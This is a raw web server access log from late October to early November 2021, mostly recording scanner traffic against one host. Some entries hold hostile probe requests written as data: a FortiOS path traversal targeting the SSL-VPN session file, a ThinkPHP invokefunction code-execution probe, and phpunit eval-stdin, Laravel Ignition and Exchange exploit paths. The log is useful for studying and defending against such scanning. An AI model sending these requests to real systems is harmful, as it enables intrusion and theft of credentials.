192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Oct/2021:22:25:00 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Oct/2021:22:25:00 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Oct/2021:22:25:00 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Oct/2021:22:25:00 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Oct/2021:22:25:00 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Oct/2021:22:30:31 +0000] 444 - GET https opds.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [29/Oct/2021:22:31:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [29/Oct/2021:22:31:20 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211030062921" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [29/Oct/2021:23:07:58 +0000] 400 - GET http localhost "/ab2g" [Client 143.198.32.230] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:23:07:58 +0000] 400 - GET http localhost "/ab2h" [Client 143.198.32.230] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:23:10:40 +0000] 444 - GET https opds.moralanimal.net "/" [Client 162.142.125.57] [Length 0] [Gzip -] "-" "-" [29/Oct/2021:23:10:41 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 162.142.125.59] [Length 0] [Gzip -] "-" "-" [29/Oct/2021:23:10:41 +0000] 400 - GET http opds.moralanimal.net "/" [Client 162.142.125.57] [Length 252] [Gzip -] "-" "-" [29/Oct/2021:23:10:41 +0000] 400 - GET http opds.moralanimal.net "/" [Client 162.142.125.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [29/Oct/2021:23:10:42 +0000] 400 - GET http whoami.moralanimal.net "/" [Client 162.142.125.59] [Length 252] [Gzip -] "-" "-" [29/Oct/2021:23:10:42 +0000] 400 - GET http whoami.moralanimal.net "/" [Client 162.142.125.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [29/Oct/2021:23:57:52 +0000] 444 - GET https 64.22.31.253 "/users/sign_in" [Client 185.53.90.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" [29/Oct/2021:23:59:13 +0000] 400 - - http localhost "-" [Client 87.251.67.156] [Length 154] [Gzip -] "-" "-" [30/Oct/2021:00:42:08 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [30/Oct/2021:01:51:06 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.204.52] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Oct/2021:02:27:23 +0000] 444 - GET https 64.22.31.253 "/users/sign_in" [Client 185.53.90.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" [30/Oct/2021:03:35:52 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [30/Oct/2021:05:08:21 +0000] 400 - GET http localhost "/ab2g" [Client 68.183.85.212] [Length 154] [Gzip -] "-" "-" [30/Oct/2021:05:08:22 +0000] 400 - GET http localhost "/ab2h" [Client 68.183.85.212] [Length 154] [Gzip -] "-" "-" [30/Oct/2021:05:13:25 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.198.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Oct/2021:05:14:02 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.148] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Oct/2021:05:17:01 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.205.170] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Oct/2021:05:30:08 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [30/Oct/2021:05:45:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.82.47.5] [Length 0] [Gzip -] "-" "-" [30/Oct/2021:06:50:46 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [30/Oct/2021:07:20:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.44] [Length 0] [Gzip -] "-" "-" [30/Oct/2021:07:20:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.44] [Length 252] [Gzip -] "-" "-" [30/Oct/2021:07:20:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [30/Oct/2021:08:45:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Oct/2021:08:53:47 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.199.130] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Oct/2021:09:31:28 +0000] 400 - - http localhost "-" [Client 89.248.165.120] [Length 154] [Gzip -] "-" "-" [30/Oct/2021:09:52:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Oct/2021:11:43:58 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [30/Oct/2021:11:59:03 +0000] 444 - POST https 64.22.31.253 "/" [Client 137.184.209.78] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [30/Oct/2021:12:25:40 +0000] 444 - GET https 64.22.31.253 "/login?returnURL=%2F" [Client 92.118.160.9] [Length 0] [Gzip -] "Go http package" "-" [30/Oct/2021:13:18:53 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.205.107] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Oct/2021:13:42:12 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [30/Oct/2021:14:31:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.203.6] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Oct/2021:15:24:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.223.168] [Length 0] [Gzip -] "-" "-" [30/Oct/2021:17:03:27 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Oct/2021:17:03:27 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Oct/2021:17:03:27 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Oct/2021:17:03:27 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Oct/2021:17:03:27 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Oct/2021:17:03:27 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Oct/2021:17:55:39 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Oct/2021:17:55:41 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Oct/2021:17:55:42 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [30/Oct/2021:17:55:45 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Oct/2021:17:55:46 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Oct/2021:17:55:49 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Oct/2021:17:55:49 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Oct/2021:17:55:50 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Oct/2021:17:55:50 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Oct/2021:17:55:51 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Oct/2021:17:55:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Oct/2021:17:55:54 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [30/Oct/2021:17:55:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Oct/2021:18:02:26 +0000] 400 - GET http 64.22.31.253 "/" [Client 54.195.139.138] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Oct/2021:18:32:07 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [30/Oct/2021:18:50:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.204.75.128] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/52.0.3057.64 Safari/537.32" "-" [30/Oct/2021:18:50:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.204.75.128] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/52.0.3057.64 Safari/537.32" "-" [30/Oct/2021:18:52:42 +0000] 444 - GET https oauth.moralanimal.net "/" [Client 107.150.63.173] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [30/Oct/2021:19:20:09 +0000] 400 - - http localhost "-" [Client 87.251.67.156] [Length 154] [Gzip -] "-" "-" [30/Oct/2021:20:28:11 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 197.248.146.186] [Length 0] [Gzip -] "Python-urllib/3.9" "-" [30/Oct/2021:21:53:34 +0000] 400 - GET http 64.22.31.253 "/" [Client 18.133.246.137] [Length 252] [Gzip -] "'Cloud mapping experiment. Contact research@pdrlabs.net'" "-" [31/Oct/2021:00:20:50 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 167.94.138.115] [Length 0] [Gzip -] "-" "-" [31/Oct/2021:00:20:52 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/" [Client 167.94.138.115] [Length 252] [Gzip -] "-" "-" [31/Oct/2021:00:20:52 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/" [Client 167.94.138.115] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [31/Oct/2021:01:24:21 +0000] 444 - GET https opds.moralanimal.net "/" [Client 69.197.185.46] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [31/Oct/2021:01:35:39 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [31/Oct/2021:01:52:39 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.39] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Oct/2021:02:00:13 +0000] 444 - GET https imap.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [31/Oct/2021:02:12:06 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [31/Oct/2021:02:16:28 +0000] 444 - GET https www.yagoal.online "/static/js/index.cc66e94a.js" [Client 216.250.255.111] [Length 0] [Gzip -] "-" "-" [31/Oct/2021:03:51:55 +0000] 400 - GET http localhost "/" [Client 134.209.91.146] [Length 252] [Gzip -] "-" "-" [31/Oct/2021:04:13:16 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [31/Oct/2021:04:27:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 65.49.20.69] [Length 0] [Gzip -] "-" "-" [31/Oct/2021:05:14:22 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.148] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Oct/2021:05:14:26 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.231] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Oct/2021:05:17:50 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.125] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Oct/2021:05:18:54 +0000] 400 - GET http localhost "/ab2g" [Client 137.184.222.91] [Length 154] [Gzip -] "-" "-" [31/Oct/2021:05:18:55 +0000] 400 - GET http localhost "/ab2h" [Client 137.184.222.91] [Length 154] [Gzip -] "-" "-" [31/Oct/2021:06:44:28 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 213.5.47.43] [Length 0] [Gzip -] "Python-urllib/3.9" "-" [31/Oct/2021:08:34:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.162] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [31/Oct/2021:08:34:48 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.162] [Length 0] [Gzip -] "-" "-" [31/Oct/2021:08:34:50 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.156] [Length 0] [Gzip -] "-" "-" [31/Oct/2021:08:34:53 +0000] 400 - - https localhost "-" [Client 23.129.64.156] [Length 154] [Gzip -] "-" "-" [31/Oct/2021:08:35:04 +0000] 400 - - https localhost "-" [Client 192.42.116.16] [Length 154] [Gzip -] "-" "-" [31/Oct/2021:09:03:11 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.204.201] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Oct/2021:11:01:02 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [31/Oct/2021:11:24:20 +0000] 400 - GET http localhost "/ab2g" [Client 159.223.11.33] [Length 154] [Gzip -] "-" "-" [31/Oct/2021:11:24:20 +0000] 400 - GET http localhost "/ab2h" [Client 159.223.11.33] [Length 154] [Gzip -] "-" "-" [31/Oct/2021:12:28:09 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Oct/2021:12:28:09 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Oct/2021:12:28:12 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Oct/2021:12:28:13 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Oct/2021:12:28:14 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [31/Oct/2021:12:28:15 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Oct/2021:12:28:15 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Oct/2021:12:28:17 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Oct/2021:12:28:17 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Oct/2021:12:28:19 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Oct/2021:12:28:23 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [31/Oct/2021:12:28:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Oct/2021:12:28:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Oct/2021:13:19:41 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.202.13] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Oct/2021:13:23:56 +0000] 400 - HEAD http localhost "/robots.txt" [Client 178.239.21.195] [Length 0] [Gzip -] "-" "-" [31/Oct/2021:14:41:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.199.52] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Oct/2021:17:03:29 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Oct/2021:17:03:29 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Oct/2021:17:03:29 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Oct/2021:17:03:29 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Oct/2021:17:03:29 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Oct/2021:17:03:29 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Oct/2021:17:26:57 +0000] 400 - GET http localhost "/ab2g" [Client 142.93.44.139] [Length 154] [Gzip -] "-" "-" [31/Oct/2021:17:26:57 +0000] 400 - GET http localhost "/ab2h" [Client 142.93.44.139] [Length 154] [Gzip -] "-" "-" [31/Oct/2021:18:19:53 +0000] 444 - GET https 64.22.31.253 "/UI/Dashboard" [Client 92.118.160.9] [Length 0] [Gzip -] "Go http package" "-" [31/Oct/2021:21:22:35 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.203.163] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Oct/2021:22:04:35 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [31/Oct/2021:22:19:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [31/Oct/2021:22:21:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Oct/2021:23:33:58 +0000] 400 - GET http localhost "/ab2g" [Client 143.198.72.226] [Length 154] [Gzip -] "-" "-" [31/Oct/2021:23:33:59 +0000] 400 - GET http localhost "/ab2h" [Client 143.198.72.226] [Length 154] [Gzip -] "-" "-" [01/Nov/2021:00:23:02 +0000] 400 - GET http 64.22.31.253 "/" [Client 106.75.211.240] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Nov/2021:02:20:00 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.210.167] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Nov/2021:02:32:46 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.209.237] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Nov/2021:03:32:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Nov/2021:04:24:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.212] [Length 0] [Gzip -] "-" "-" [01/Nov/2021:04:58:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.43] [Length 0] [Gzip -] "-" "-" [01/Nov/2021:04:58:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.43] [Length 252] 